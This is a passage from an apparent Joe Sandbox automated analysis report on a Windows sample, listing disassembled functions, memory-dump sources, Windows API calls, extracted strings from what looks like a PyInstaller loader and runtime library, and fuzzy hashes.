                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 211107550-393685449
                                                                                      • Opcode ID: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
                                                                                      • Instruction ID: af2698ca1f068180cb7d4bbe3f7227779353ebc3ce2927a35cf995eb3e0c7dc9
                                                                                      • Opcode Fuzzy Hash: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
                                                                                      • Instruction Fuzzy Hash: 2EE1C273908B828AE710AF76D8803BD77A0FB44768F940276DA8D576E5DF78E5A1C700
                                                                                      Function 00007FF7F3DD1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      • Opcode ID: 4b5b6e3fcef3044075732b7736491b2407c08096ec4bb89f35b93de1ee291999
                                                                                      • Instruction ID: dadcda14d6b83b980c0354c7bfc0dc0128aa30ee8e9a7e8485dd92544c0c36ec
                                                                                      • Opcode Fuzzy Hash: 4b5b6e3fcef3044075732b7736491b2407c08096ec4bb89f35b93de1ee291999
                                                                                      • Instruction Fuzzy Hash: 81418E61A0865382EB94FB92A8406B9F7A5FF44BC4FC44532ED2D2B7C5DE3CE54583A0
                                                                                      Function 00007FF7F3DD8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD8704
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD870A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD874C
                                                                                        • Part of subcall function 00007FF7F3DD8830: GetEnvironmentVariableW.KERNEL32(00007FF7F3DD388E), ref: 00007FF7F3DD8867
                                                                                        • Part of subcall function 00007FF7F3DD8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F3DD8889
                                                                                        • Part of subcall function 00007FF7F3DE8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE8251
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                      • API String ID: 3563477958-1339014028
                                                                                      • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction ID: 5460fdd844c23a0caff50222cc78e142a0a5b6fb2ca46bdd174d2b9a71add00c
                                                                                      • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction Fuzzy Hash: 9B419F11A1964254FB96B7E1A8652B9A290AF84BC0FC04131ED3D6F7DADE3CE545C3E0
                                                                                      Function 00007FFE126CC7F8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                      • API String ID: 2943138195-2239912363
                                                                                      • Opcode ID: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
                                                                                      • Instruction ID: b79f4730f684e6a29947a852956668a9af22be3f671a899f4cc6fb68bbfda555
                                                                                      • Opcode Fuzzy Hash: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
                                                                                      • Instruction Fuzzy Hash: D3518D62E09F458DFB159B62DC402BD3BB0BB08768F844176CA8D12BE9DFBC9164C700
                                                                                      Function 00007FF7F3DDEA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 849930591-393685449
                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction ID: 87e55a07004d764e5f578cf396403638c36e6746f4176f38b9332c186a714f53
                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction Fuzzy Hash: C7D1813290874186EBA0EFA5D4403ADB7A4FB45788F900135EE9D6B7D9DF38E485C790
                                                                                      Function 00007FFE126C662A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                      • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                      • API String ID: 1852475696-928371585
                                                                                      • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                      • Instruction ID: e3529c7c42af87bcc5cb6a07d845d3282d79ba30fa6ab6936adc7a1f4dfefd6f
                                                                                      • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                      • Instruction Fuzzy Hash: 8F51A262A18E4A9ADE20EF12EC501B96360FF84BA4F804471DA8D036B5DFBCF925C704
                                                                                      Function 00007FF7F3DEED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000019FAF4B9778,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE8C
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000019FAF4B9778,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE98
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeLibraryProc
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3013587201-537541572
                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction ID: 37933d31b63b379ae2dcbb5bd94ec17a9785335afdd77bd7dc2312315796d10e
                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction Fuzzy Hash: 68414761B09A1241EB99EB929800275A691BF48BD0FC84235DD3D6F3C4DF7CE88583A1
                                                                                      Function 00007FF7F3DD2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                      • API String ID: 3940978338-251083826
                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction ID: 2512fbdb768b8aa149cdf9070e354e8befd28865d8375289a040942718875d56
                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction Fuzzy Hash: B031F622B08B4142E760BB65B8502ABB695BF887C8F810135EF6D6B7D9DF3CD546C390
                                                                                      Function 00007FFE126C6FE4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7069
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7077
                                                                                      • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7090
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C70A2
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C7110
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FFE126C71A3,?,?,00000000,00007FFE126C6FD4,?,?,?,?,00007FFE126C6D11), ref: 00007FFE126C711C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 916704608-2084034818
                                                                                      • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                      • Instruction ID: 0f9aa2f1c090669d4c9ce12e5a00f937dddbd2dae8efe9ca9120d41991af0b76
                                                                                      • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                      • Instruction Fuzzy Hash: 74318D21B1AF8692EE1AAB03AC005B56398BF04BB4F994575DD5D0B3E0EEBCE5648710
                                                                                      Function 00007FFE126C2C38 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1501936508-0
                                                                                      • Opcode ID: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
                                                                                      • Instruction ID: 2916e0e4180614e5f43bfe31f009f5bb150291c42e69522df6641eac65ec66db
                                                                                      • Opcode Fuzzy Hash: 65b26e5f074ca0aafdff43cbb52cf6556557cf4e92b090b05be647d0b4ff5bec
                                                                                      • Instruction Fuzzy Hash: EF51A331A0DE4782FAA5AB17DC4463963A4AF54FA4F8944B6CE4D067F4DFACE462C340
                                                                                      Function 00007FFE126C2E1C Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abort$AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1501936508-0
                                                                                      • Opcode ID: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
                                                                                      • Instruction ID: 567de5eac377899e8ce480c9a51d580babdad5b81c0d578c9791ce8f099bb060
                                                                                      • Opcode Fuzzy Hash: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
                                                                                      • Instruction Fuzzy Hash: C051D461A4DE4B82EA65EF139C446386394AF48FA0F8984B5DE9D067F4DFFCE4618340
                                                                                      Function 00007FFE126CEB88 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: {for
                                                                                      • API String ID: 2943138195-864106941
                                                                                      • Opcode ID: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
                                                                                      • Instruction ID: 387a958fa72e27ad202b2255a781edca7acbb2ea17e89f1bfe7f00bc906ecdbe
                                                                                      • Opcode Fuzzy Hash: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
                                                                                      • Instruction Fuzzy Hash: 14514F72A08E899EE701AF66DC443E837A4EB54758F8080B1EA4D47BE5DFBCE565C300
                                                                                      Function 00007FFE126CE174 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameName::atol
                                                                                      • String ID: `template-parameter$void
                                                                                      • API String ID: 2130343216-4057429177
                                                                                      • Opcode ID: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
                                                                                      • Instruction ID: 6f45665923b3fcb19512321597e673b43bf491777d70ecf815a00f524f5a4c45
                                                                                      • Opcode Fuzzy Hash: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
                                                                                      • Instruction Fuzzy Hash: DE416C22F08F5A89FB009BA2DC512FC33B1BB487A8F950175CE4D16AA9DFBCA555C340
                                                                                      Function 00007FF7F3DDDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD4D
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD5B
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD85
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDF3
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 2559590344-2084034818
                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction ID: 49d4018a666ae8789ed039aaefa646c712ae924cde501a2b2e9f5a88cd3f76e4
                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction Fuzzy Hash: 5A319321B1A741D1EF91AB92A4006B5B394FF48BA4F994535DD3D2E3C8DE3CE44482B0
                                                                                      Function 00007FFE126C8EC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                      • API String ID: 1405650943-2211150622
                                                                                      • Opcode ID: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
                                                                                      • Instruction ID: e9981fb8173089d25988408a1f9a60ba663e6c8c1ac83d7ed74c027bd095876a
                                                                                      • Opcode Fuzzy Hash: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
                                                                                      • Instruction Fuzzy Hash: 21413871E08F4A9EF7229B66DC542B837A1BB083A8F9445B1CA9C123F4DFBCA551C740
                                                                                      Function 00007FFE126CACC4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
